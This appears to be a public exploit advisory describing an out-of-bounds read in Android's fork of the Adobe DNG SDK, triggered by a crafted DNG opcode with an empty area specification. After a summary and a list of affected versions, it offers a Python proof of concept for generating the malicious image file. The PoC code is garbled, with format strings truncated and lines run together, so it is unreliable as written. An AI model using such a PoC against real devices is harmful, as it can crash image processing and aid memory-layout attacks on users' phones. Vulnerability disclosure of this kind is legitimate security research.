============================================================================================================================================= | # Title : Adobe DNG SDK v1.4 (Android’s fork) Out-of-Bounds Read | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : https://cs.android.com/android/platform/superproject/ | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/207365/ [+] Summary : A vulnerability exists in Adobe DNG SDK (the fork used by Android) due to improper validation of the fAreaSpec fields inside the dng_opcode_DeltaPerRow::ProcessArea function. If an attacker supplies a crafted DNG file with an empty or malformed fAreaSpec, the SDK performs arithmetic that results in signed integer underflow. This underflow leads to an out‑of‑bounds read when computing the lookup table pointer. Because the DNG SDK is widely used in Android’s raw‑image pipeline (BuildImageStage2), the bug becomes reachable from remote contexts that process untrusted DNG images. The vulnerability can result in a crash and may enable ASLR bypass, since observable differences in behavior depend on memory layout. Android has shipped this vulnerable DNG fork for over 12 years, affecting multiple generations of devices. [+] Affected Version : Adobe DNG SDK v1.4 (Android’s fork) All Android versions using this fork, including: Android 15 Android 14 Android 13 And earlier versions [+] POC : python poc.py ===> Python version to generate the malicious DNG: import struct def create_malicious_dng(filename): with open(filename, 'wb') as f: # TIFF Header f.write(struct.pack('= bottom makes fAreaSpec empty 64, # right 1, # row_pitch 1, # col_pitch 0, # plane 1 # planes ] # Pack each parameter individually to avoid format string issues for param in opcode_params: f.write(struct.pack('